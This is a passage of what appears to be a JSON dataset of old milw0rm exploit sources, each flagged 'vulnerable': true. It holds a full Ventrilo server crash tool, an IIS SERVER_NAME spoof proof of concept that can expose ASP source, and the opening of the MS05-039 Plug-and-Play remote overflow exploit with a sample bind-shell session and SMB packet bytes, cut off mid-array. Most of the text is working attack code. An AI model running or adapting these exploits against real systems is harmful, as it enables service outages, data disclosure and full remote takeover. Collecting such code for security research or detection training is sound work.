ventrilo_udp_head_dec(unsigned char *data) {\n\n    int             i;\n\n    unsigned short  *p;\n\n    unsigned char   a1,\n\n                    a2;\n\n\n\n    p = (unsigned short *)data;\n\n    data += 2;\n\n\n\n    *p = ntohs(*p);\n\n    a1 = *p;\n\n    if(!a1) return;\n\n    a2 = *p >> 8;\n\n\n\n    for(i = 0; i < 18; i++) {\n\n        data[i] -= ventrilo_udp_encdata_head[a2] + (i % 5);\n\n        a2 += a1;\n\n    }\n\n\n\n    for(i = 0; i < 9; i++) {\n\n        p++;\n\n        *p = ntohs(*p);\n\n    }\n\n}\n\n\n\n\n\n\n\nvoid ventrilo_udp_head_enc(unsigned char *data) {\n\n    int             i;\n\n    unsigned short  *p;\n\n    unsigned char   a1,\n\n                    a2;\n\n\n\n    p = (unsigned short *)data;\n\n    data += 2;\n\n\n\n    *p = (((VENTRILO_RAND * 0x343fd) + 0x269ec3) >> 16) & 0x7fff;\n\n    a1 = *p;\n\n    a2 = *p >> 8;\n\n    if(!a2) {\n\n        a2 = 69;\n\n        *p |= (a2 << 8);\n\n    }\n\n\n\n    for(i = 0; i < 10; i++) {\n\n        *p = htons(*p);\n\n        p++;\n\n    }\n\n\n\n    for(i = 0; i < 18; i++) {\n\n        data[i] += ventrilo_udp_encdata_head[a2] + (i % 5);\n\n        a2 += a1;\n\n    }\n\n}\n\n\n\n\n\n\n\nvoid ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short key) {\n\n    int             i;\n\n    unsigned char   a1,\n\n                    a2;\n\n\n\n    a1 = key;\n\n    if(!a1) return;\n\n    a2 = key >> 8;\n\n\n\n    for(i = 0; i < len; i++) {\n\n        data[i] -= ventrilo_udp_encdata_data[a2] + (i % 72);\n\n        a2 += a1;\n\n    }\n\n}\n\n\n\n\n\n\n\nunsigned short ventrilo_udp_data_enc(unsigned char *data, int len) {\n\n    int             i;\n\n    unsigned short  key;\n\n    unsigned char   a1,\n\n                    a2;\n\n\n\n    key = (((VENTRILO_RAND * 0x343fd) + 0x269ec3) >> 16) & 0x7fff;\n\n    a1 = key;\n\n    a2 = key >> 8;\n\n    if(!a2) {\n\n        a2 = 1;\n\n        key |= (a2 << 8);\n\n    }\n\n\n\n    for(i = 0; i < len; i++) {\n\n        data[i] += ventrilo_udp_encdata_data[a2] + (i % 72);\n\n        a2 += a1;\n\n    }\n\n\n\n    return(key);\n\n}\n\n\n\n\n\n\n\nunsigned short ventrilo_udp_crc(unsigned char *data, int len) {\n\n    unsigned short  crc = 0;\n\n    const static unsigned short table[] = {\n\n        0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,\n\n        0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,\n\n        0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,\n\n        0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,\n\n        0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,\n\n        0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,\n\n        0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,\n\n        0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,\n\n        0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,\n\n        0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,\n\n        0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,\n\n        0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,\n\n        0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,\n\n        0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,\n\n        0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,\n\n        0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,\n\n        0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,\n\n        0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,\n\n        0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,\n\n        0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,\n\n        0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,\n\n        0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,\n\n        0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,\n\n        0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,\n\n        0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,\n\n        0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,\n\n        0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,\n\n        0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,\n\n        0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,\n\n        0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,\n\n        0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,\n\n        0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0\n\n    };\n\n\n\n    while(len--) {\n\n        crc = table[crc >> 8] ^ *data ^ (crc << 8);\n\n        data++;\n\n    }\n\n\n\n    return(crc);\n\n}\n\n\n\n\n\n#undef VENTRILO_RAND\n\n\n\n#ifdef WIN32\n\n    #include <winsock.h>\n\n/*\n\n   Header file used for manage errors in Windows\n\n   It support socket and errno too\n\n   (this header replace the previous sock_errX.h)\n\n*/\n\n\n\n#include <string.h>\n\n#include <errno.h>\n\n\n\n\n\n\n\nvoid std_err(void) {\n\n    char    *error;\n\n\n\n    switch(WSAGetLastError()) {\n\n        case 10004: error = \"Interrupted system call\"; break;\n\n        case 10009: error = \"Bad file number\"; break;\n\n        case 10013: error = \"Permission denied\"; break;\n\n        case 10014: error = \"Bad address\"; break;\n\n        case 10022: error = \"Invalid argument (not bind)\"; break;\n\n        case 10024: error = \"Too many open files\"; break;\n\n        case 10035: error = \"Operation would block\"; break;\n\n        case 10036: error = \"Operation now in progress\"; break;\n\n        case 10037: error = \"Operation already in progress\"; break;\n\n        case 10038: error = \"Socket operation on non-socket\"; break;\n\n        case 10039: error = \"Destination address required\"; break;\n\n        case 10040: error = \"Message too long\"; break;\n\n        case 10041: error = \"Protocol wrong type for socket\"; break;\n\n        case 10042: error = \"Bad protocol option\"; break;\n\n        case 10043: error = \"Protocol not supported\"; break;\n\n        case 10044: error = \"Socket type not supported\"; break;\n\n        case 10045: error = \"Operation not supported on socket\"; break;\n\n        case 10046: error = \"Protocol family not supported\"; break;\n\n        case 10047: error = \"Address family not supported by protocol family\"; break;\n\n        case 10048: error = \"Address already in use\"; break;\n\n        case 10049: error = \"Can't assign requested address\"; break;\n\n        case 10050: error = \"Network is down\"; break;\n\n        case 10051: error = \"Network is unreachable\"; break;\n\n        case 10052: error = \"Net dropped connection or reset\"; break;\n\n        case 10053: error = \"Software caused connection abort\"; break;\n\n        case 10054: error = \"Connection reset by peer\"; break;\n\n        case 10055: error = \"No buffer space available\"; break;\n\n        case 10056: error = \"Socket is already connected\"; break;\n\n        case 10057: error = \"Socket is not connected\"; break;\n\n        case 10058: error = \"Can't send after socket shutdown\"; break;\n\n        case 10059: error = \"Too many references, can't splice\"; break;\n\n        case 10060: error = \"Connection timed out\"; break;\n\n        case 10061: error = \"Connection refused\"; break;\n\n        case 10062: error = \"Too many levels of symbolic links\"; break;\n\n        case 10063: error = \"File name too long\"; break;\n\n        case 10064: error = \"Host is down\"; break;\n\n        case 10065: error = \"No Route to Host\"; break;\n\n        case 10066: error = \"Directory not empty\"; break;\n\n        case 10067: error = \"Too many processes\"; break;\n\n        case 10068: error = \"Too many users\"; break;\n\n        case 10069: error = \"Disc Quota Exceeded\"; break;\n\n        case 10070: error = \"Stale NFS file handle\"; break;\n\n        case 10091: error = \"Network SubSystem is unavailable\"; break;\n\n        case 10092: error = \"WINSOCK DLL Version out of range\"; break;\n\n        case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\n\n        case 10071: error = \"Too many levels of remote in path\"; break;\n\n        case 11001: error = \"Host not found\"; break;\n\n        case 11002: error = \"Non-Authoritative Host not found\"; break;\n\n        case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\n\n        case 11004: error = \"Valid name, no data record of requested type\"; break;\n\n        default: error = strerror(errno); break;\n\n    }\n\n    fprintf(stderr, \"\\nError: %s\\n\", error);\n\n    exit(1);\n\n}\n\n\n\n//inserted headers /str0ke\n\n\n\n    #define close   closesocket\n\n    #define ONESEC  1000\n\n#else\n\n    #include <unistd.h>\n\n    #include <sys/socket.h>\n\n    #include <sys/types.h>\n\n    #include <arpa/inet.h>\n\n    #include <netinet/in.h>\n\n    #include <netdb.h>\n\n\n\n    #define ONESEC  1\n\n#endif\n\n\n\n\n\n\n\n#define VER         \"0.1\"\n\n#define PORT        3784\n\n#define MAXPCK      32\n\n#define MAXPCKSZ    492\n\n#define TIMEOUT     2\n\n#define RETRY       2\n\n\n\n\n\n\n\nint ventrilo_get_status(int sd, u_short cmd, u_char *pass, int bug);\n\nint timeout(int sock);\n\nu_int resolv(char *host);\n\nvoid std_err(void);\n\n\n\n\n\n\n\nstruct  sockaddr_in peer;\n\n\n\n\n\n\n\nint main(int argc, char *argv[]) {\n\n    int     sd;\n\n    u_short port = PORT;\n\n\n\n#ifdef WIN32\n\n    WSADATA    wsadata;\n\n    WSAStartup(MAKEWORD(1,0), &wsadata);\n\n#endif\n\n\n\n\n\n    setbuf(stdout, NULL);\n\n\n\n    fputs(\"\\n\"\n\n        \"Ventrilo <= 2.3.0 server crash \"VER\"\\n\"\n\n        \"by Luigi Auriemma\\n\"\n\n        \"e-mail: aluigi@autistici.org\\n\"\n\n        \"web:    http://aluigi.altervista.org\\n\"\n\n        \"\\n\", stdout);\n\n\n\n    if(argc < 2) {\n\n        printf(\"\\n\"\n\n            \"Usage: %s <host> [port(%hu)]\\n\"\n\n            \"\\n\", argv[0], port);\n\n        exit(1);\n\n    }\n\n\n\n    if(argc > 2) port = atoi(argv[2]);\n\n    peer.sin_addr.s_addr = resolv(argv[1]);\n\n    peer.sin_port        = htons(port);\n\n    peer.sin_family      = AF_INET;\n\n\n\n    printf(\"- target   %s : %hu\\n\",\n\n        inet_ntoa(peer.sin_addr), port);\n\n\n\n    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n\n    if(sd < 0) std_err();\n\n\n\n    fputs(\"\\n- check server:\\n\", stdout);\n\n    if(ventrilo_get_status(sd, 1, \"\", 0) < 0) {\n\n        fputs(\"\\nError: no reply received, probably the server is not online\\n\\n\", stdout);\n\n        exit(1);\n\n    }\n\n\n\n    sleep(ONESEC);\n\n\n\n    fputs(\"\\n- send BOOM packet:\\n\", stdout);\n\n    ventrilo_get_status(sd, 1, \"\", 1);\n\n\n\n    sleep(ONESEC);\n\n\n\n    fputs(\"\\n- check server:\\n\", stdout);\n\n    if(ventrilo_get_status(sd, 1, \"\", 0) < 0) {\n\n        fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\n\n    } else {\n\n        fputs(\"\\nServer doesn't seem vulnerable\\n\\n\", stdout);\n\n    }\n\n\n\n    close(sd);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nint ventrilo_get_status(int sd, u_short cmd, u_char *pass, int bug) {\n\n    ventrilo_udp_head   *stat;\n\n    int     i,\n\n            len,\n\n            totlen,\n\n            retry;\n\n    u_short id,\n\n            crc;\n\n    u_char  buff[20 + MAXPCKSZ],\n\n            full[MAXPCKSZ * MAXPCK],\n\n            *data;\n\n\n\n    stat = (ventrilo_udp_head *)buff;\n\n    data = buff + 20;\n\n\n\n    strncpy(data, pass, 16);\n\n\n\n    stat->zero    = 0;\n\n    stat->cmd     = cmd;\n\n    stat->id      = id = time(NULL);\n\n    stat->totlen  = 16;\n\n    stat->len     = 16;\n\n    stat->totpck  = 1;\n\n    stat->pck     = 0;\n\n    stat->crc     = ventrilo_udp_crc(data, 16);\n\n    stat->datakey = ventrilo_udp_data_enc(data, 16);\n\n    ventrilo_udp_head_enc(buff);\n\n\n\n    for(retry = RETRY; retry; retry--) {\n\n        sendto(sd, buff,\n\n            20 + (bug ? 0 : 16),    // BUG exploited here\n\n            0, (struct sockaddr *)&peer, sizeof(peer));\n\n        if(!timeout(sd)) break;\n\n    }\n\n    if(!retry) return(-1);\n\n\n\n    i      = 0;\n\n    totlen = 0;\n\n    memset(full, ' ', sizeof(full));    // in case of packet loss\n\n\n\n    for(;;) {\n\n        len = recvfrom(sd, buff, sizeof(buff), 0, NULL, NULL);\n\n        ventrilo_udp_head_dec(buff);\n\n\n\n        if(stat->id != id) continue;\n\n\n\n        if((len < 20)                 ||\n\n           (stat->totpck < stat->pck) ||\n\n           (stat->totpck > MAXPCK)    ||\n\n           (stat->len    > MAXPCKSZ)) {\n\n            fputs(\"\\nError: wrong or incomplete reply received\\n\", stdout);\n\n            return(0);\n\n        }\n\n\n\n        len    = stat->len;\n\n        totlen += len;\n\n        if(totlen > sizeof(full)) break;\n\n\n\n        ventrilo_udp_data_dec(data, len, stat->datakey);\n\n        memcpy(full + (stat->pck * MAXPCKSZ), data, len);\n\n\n\n        if(++i == stat->totpck) break;\n\n        if(totlen == stat->totlen) break;\n\n        if(timeout(sd) < 0) break;\n\n    }\n\n\n\n    crc = ventrilo_udp_crc(full, totlen);\n\n    if(ventrilo_udp_crc(full, totlen) != stat->crc) {\n\n        printf(\"- wrong checksum: mine is %04x while should be %04x\\n\\n\", crc, stat->crc);\n\n    }\n\n\n\n    fwrite(full, totlen, 1, stdout);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nint timeout(int sock) {\n\n    struct  timeval tout;\n\n    fd_set  fd_read;\n\n    int     err;\n\n\n\n    tout.tv_sec = TIMEOUT;\n\n    tout.tv_usec = 0;\n\n    FD_ZERO(&fd_read);\n\n    FD_SET(sock, &fd_read);\n\n    err = select(sock + 1, &fd_read, NULL, NULL, &tout);\n\n    if(err < 0) std_err();\n\n    if(!err) return(-1);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nu_int resolv(char *host) {\n\n    struct hostent *hp;\n\n    u_int  host_ip;\n\n\n\n    host_ip = inet_addr(host);\n\n    if(host_ip == INADDR_NONE) {\n\n        hp = gethostbyname(host);\n\n        if(!hp) {\n\n            printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\n\n            exit(1);\n\n        } else host_ip = *(u_int *)hp->h_addr;\n\n    }\n\n    return(host_ip);\n\n}\n\n\n\n\n\n\n\n#ifndef WIN32\n\n    void std_err(void) {\n\n        perror(\"\\nError\");\n\n        exit(1);\n\n    }\n\n#endif\n\n\n\n// milw0rm.com [2005-08-23]",
925        "vulnerable": true
926    },
927    {
928        "exploit_id": 1178,
929        "content": "/*\n\n====================================================================================\n\n||  ##           #######  ##   ##    ##     #######   #######       ##    ##  ##  ||\n\n||  ##           ##    ##  ## ##  ########  ##        ##         ######## ## ##   ||\n\n||  ##     ##### ########   ###      ##     #######   #######       ##    ####    ||\n\n||  ##           ##    ##   ##       ##     ##             ##  ###  ##    ## ##   ||\n\n||  ######       #######    ##       ##     #######   #######  ###  ##    ##  ##  ||\n\n====================================================================================\n\n\n\nName: IIS 5.x and IIS 6.0 Server Name Spoof PoC\n\nFile: IIS_5.x_and_IIS_6.0_Server_Name_Spoof.c\n\nDescription: Proof of concept\n\nAuthor: Lympex\n\nContact:\n\n+ Web: http://l-bytes.tk\n\n+ Mail: lympex[at]gmail[dot]com\n\nDate: 25/08/2005\n\nExtra: Compiled with Visual C++ 6.0\n\n\n\n\n\n################################################################################################################\n\n#Remote IIS 5.x and IIS 6.0 Server Name Spoof\n\n#\n\n#It is possible to remotely spoof the \"SERVER_NAME\" Microsoft\u00ae Internet Information Server\u00ae 5.0, 5.1 and 6.0 \n\n#server variable by doing a modified HTTP request. Thus potentially revealing sensitive ASP code through the \n\n#IIS 500-100.asp error page, the spoof also opens up a potential range of exploits in third party web \n\n#applications and web services.\n\n#\n\n#Technical Description\n\n#Microsoft\u00ae IIS 5.x \u00ae shows sensitive information if the \"SERVER_NAME\" IIS 5.x server variable is \"localhost\". \n\n#If a IIS 5.x ASP page has an error, the code on the fault line in the ASP page is shown in the browser, \n\n#but only if\"SERVER_NAME\" IIS server variable is \"localhost\". One can spoof the \"SERVER_NAME\" IIS server \n\n#variable so that it shows whatever one want. Other third party web applications or web services may also \n\n#be vulnerable if authentication depends on the validity this server variable. IIS 6.0 is vulnerable to the \n\n#spoof, but it's 500-100.asp page is not vulnerable.\n\n#\n\n#The IIS server variable that can be spoofed is the \"SERVER_NAME\", it can be accessed through \n\n#request.servervariables(\"SERVER_NAME\") with ASP, and HttpContext.Current.Request.ServerVariables(\"SERVER_NAME\") \n\n#with .NET, other programming languages have other methods to access this server variable, but are \n\n#equally vulnerable.\n\n#\n\n#If the HTTP request comes from a remote client, then the server variable \"SERVER_NAME\" returns the IP \n\n#address of the web server itself. If the HTTP request came from the same IP as the web server (thus the \n\n#request came from the an authenticated user browsing from the web server itself), then \n\n#request.servervariables(\"SERVER_NAME\") returns \"localhost\". This fact is used as \"proof\" in web applications\n\n#or web services that the person browsing the web server is in fact browsing from the web server itself. \n\n#The web applications or web services may use this proof to display an administrative interface to the web \n\n#browser user if such is the case. One exploitable example is the IIS 5.x 500-100.asp page(Note: the \n\n#IIS 6.0 500-100.asp page is no vulnerable); the page uses the server variable to determine if to display \n\n#the code where the error occurred.\n\n#\n\n#The technical description of the server variable is \"The server's host name, DNS alias, or IP address as \n\n#it would appear in self-referencing URLs\", it is therefore often used to determine the IP address of the \n\n#web server itself in once code, this opens up for a range of exploits including cookie-stealing, data \n\n#redirection, and other URL manipulation issues.\n\n#\n\n#There are many other applications that utilize validity of this server variable, and MSDN holds many \n\n#examples for developers that are easily exploitable with this bug; among the most serious are the \n\n#Microsoft\u00ae .NET Passport SDK examples, any web application or web service based on these examples are \n\n#probably vulnerable due to the bug.\n\n################################################################################################################\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <winsock2.h>\n\n#pragma comment(lib,\"ws2_32.lib\")\n\n\n\n//max size to socket buffer\n\n#define LEN_BUF 2048\n\n//socket status\n\n#define Conectado 1868\n\n\n\nvoid main(int argc, char *argv[])\n\n{\n\n\t/*connect to a host throught a port*/\n\n\tint Conecta(char *Host, short puerto);\n\n\t//socket from the connection\n\n\tint socket;\n\n\t//to get the data received\n\n\tchar buf[LEN_BUF];\n\n\tFILE *data;\n\n\n\n\tprintf(\"\\n                 Proof of Concept\");\n\n\tprintf(\"\\n IIS 5.x and IIS 6.0 Server Name Spoof - by Lympex\");\n\n\tprintf(\"\\nContact: lympex[at]gmail[dot]com - http://l-bytes.tk\");\n\n\tprintf(\"\\n----------------------------------------------------\\n\");\n\n\n\n\tif(argc!=4)\n\n\t{\n\n\t\tprintf(\"\\n[+] Usage: %s server.com 80 /test.asp\\n\",argv[0]);return;\n\n\t}\n\n\n\n\t//conectamos\n\n\tsocket=Conecta(argv[1],(short)atoi(argv[2]));\n\n\n\n\tif(socket==-1)\n\n\t{\n\n\t\tprintf(\"\\n[+] Error connecting to host\\n\");\n\n\t\treturn;\n\n\t}printf(\"\\n[+] Connected!\\n\");\n\n\n\n\tif((data=fopen(\"received_data.txt\",\"w\"))==NULL)\n\n\t{\n\n\t\tprintf(\"\\n[+] Error saving received data\\n\");\n\n\t\tWSACleanup();\n\n\t\treturn;\n\n\t}\n\n\n\n\t/*send the EVIL REQUEST*/\n\n\tstrcpy(buf,\"GET http://localhost\");strcat(buf,argv[3]);strcat(buf,\" HTTP/1.0\\n\\n\");\n\n\tsend(socket,buf,strlen(buf),0);\n\n\n\n\t//while we aren\u00b4t disconnected\n\n\tdo\n\n\t{\n\n\t\tbuf[recv(socket,buf,LEN_BUF,0)]='\\0';\n\n\t\tfputs(buf,data);\n\n\t}while(socket==Conectado);\n\n\n\n\tWSACleanup();\n\n\tfclose(data);\n\n\tprintf(\"\\n[+] Received data, saved in: \\x22received_data.txt\\x22\\n\");\n\n\treturn;\n\n}\n\n\n\n/*Connect to a host throught a port - by Lympex*/\n\nint Conecta(char *Host, short puerto)\n\n{\n\n\t/*para crear el socket*/\n\n\tWSADATA wsaData;\n\n\tSOCKET Winsock;//el que escucha\n\n\t/*estructura con los datos para realizar la conexion*/\n\n\tstruct sockaddr_in Winsock_In;\n\n\tstruct hostent *Ip;\n\n\n\n\t/*iniciamos el socket*/\n\n\tWSAStartup(MAKEWORD(2,2), &wsaData);\n\n\t/*asociamos*/\n\n\tWinsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);\n\n\t\n\n\t//miramos si est\u00e1 correcto, y as\u00ed no rellenamos la estructura Winsock_In para nada\n\n\tif(Winsock==INVALID_SOCKET)\n\n\t{\n\n\t\t/*salimos*/\n\n\t\tWSACleanup();\n\n\t\treturn -1;\n\n\t}\n\n\n\n\t/*rellenamos la estructura*/\n\n\tIp=gethostbyname(Host);\n\n\tWinsock_In.sin_port=htons(puerto);\n\n\tWinsock_In.sin_family=AF_INET;\n\n\tWinsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));\n\n\n\n\t/*conectamos*/\n\n\tif(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\n\n\t{\n\n\t\t/*salimos*/\n\n\t\tWSACleanup();\n\n\t\treturn -1;\n\n\t}\n\n\n\n\treturn Winsock;\n\n}\n\n\n\n// milw0rm.com [2005-08-25]",
930        "vulnerable": true
931    },
932    {
933        "exploit_id": 1179,
934        "content": "/*\n\n * HOD-ms05039-pnp-expl-spanish.c [25.Aug.2005]\n\n * Very slightly modified version by Roman Medina <roman@rs-labs.com>\n\n * Tested on Win2k SP4 Spanish.\n\n * Original credits & comments follow.\n\n */\n\n\n\n\n\n/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2\n\n *\n\n * Copyright (c) 2005 houseofdabus.\n\n *\n\n * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n\n * Universal Exploit + no crash shellcode\n\n *\n\n *\n\n *\n\n *\n\n *                 .::[ houseofdabus ]::.\n\n *\n\n *\n\n *\n\n * ---------------------------------------------------------------------\n\n * Description:\n\n *    A remote code execution and local elevation of privilege\n\n *    vulnerability exists in Plug and Play that could allow an\n\n *    attacker who successfully exploited this vulnerability to take\n\n *    complete control of the affected system.\n\n *\n\n *    This is a remote code execution and local privilege elevation\n\n *    vulnerability. On Windows 2000, an anonymous attacker could\n\n *    remotely try to exploit this vulnerability.\n\n *\n\n *    On Windows XP Service Pack 1, only an authenticated user could\n\n *    remotely try to exploit this vulnerability.\n\n *    On Window XP Service Pack 2 and Windows Server 2003, only an\n\n *    administrator can remotely access the affected component.\n\n *    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,\n\n *    this is strictly a local privilege elevation vulnerability.\n\n *    An anonymous user cannot remotely attempt to exploit this\n\n *    vulnerability on Windows XP Service Pack 2 and Windows\n\n *    Server 2003.\n\n *\n\n * ---------------------------------------------------------------------\n\n * Solution:\n\n *    http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx\n\n *\n\n * ---------------------------------------------------------------------\n\n * Systems Affected:\n\n *    - Windows Server 2003, SP1\n\n *    - Windows XP SP1, SP2\n\n *    - Windows 2000 SP4\n\n *\n\n * ---------------------------------------------------------------------\n\n * Tested on:\n\n *    - Windows 2000 SP4\n\n *\n\n * ---------------------------------------------------------------------\n\n * Compile:\n\n *\n\n * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n *\n\n * ---------------------------------------------------------------------\n\n * Example:\n\n *\n\n * C:\\>HOD-ms05039-pnp-expl 192.168.0.1 7777\n\n *\n\n * [*] connecting to 192.168.0.22:445...ok\n\n * [*] null session...ok\n\n * [*] bind pipe...ok\n\n * [*] sending crafted packet...ok\n\n * [*] check your shell on 192.168.0.1:7777\n\n * Ctrl+C\n\n *\n\n * C:\\>nc 192.168.0.1 7777\n\n *\n\n * Microsoft Windows 2000 [Version 5.00.2195]\n\n * (C) Copyright 1985-2000 Microsoft Corp.\n\n *\n\n * C:\\WINNT\\system32>\n\n *\n\n * ---------------------------------------------------------------------\n\n *\n\n * This is provided as proof-of-concept code only for educational\n\n * purposes and testing by authorized individuals with permission\n\n * to do so.\n\n *\n\n */\n\n\n\n/* #define _WIN32 */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#ifdef _WIN32\n\n#include <winsock2.h>\n\n#pragma comment(lib, \"ws2_32\")\n\n#else\n\n#include <sys/types.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n#include <netdb.h>\n\n#endif\n\n\n\n\n\nunsigned char SMB_Negotiate[] =\n\n\t\"\\x00\\x00\\x00\\x85\\xFF\\x53\\x4D\\x42\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x62\\x00\\x02\\x50\\x43\\x20\\x4E\\x45\\x54\\x57\\x4F\"\n\n\t\"\\x52\\x4B\\x20\\x50\\x52\\x4F\\x47\\x52\\x41\\x4D\\x20\\x31\\x2E\\x30\\x00\\x02\"\n\n\t\"\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00\\x02\\x57\\x69\\x6E\\x64\\x6F\"\n\n\t\"\\x77\\x73\\x20\\x66\\x6F\\x72\\x20\\x57\\x6F\\x72\\x6B\\x67\\x72\\x6F\\x75\\x70\"\n\n\t\"\\x73\\x20\\x33\\x2E\\x31\\x61\\x00\\x02\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\"\n\n\t\"\\x32\\x00\\x02\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x32\\x2E\\x31\\x00\\x02\\x4E\\x54\"\n\n\t\"\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00\";\n\n\n\n\n\nunsigned char SMB_SessionSetupAndX[] =\n\n\t\"\\x00\\x00\\x00\\xA4\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x00\\x10\\x00\\x0C\\xFF\\x00\\xA4\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x69\\x00\\x4E\"\n\n\t\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x01\\x00\\x00\\x00\\x97\\x82\\x08\\xE0\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\"\n\n\t\"\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\"\n\n\t\"\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\"\n\n\t\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\"\n\n\t\"\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_SessionSetupAndX2[] 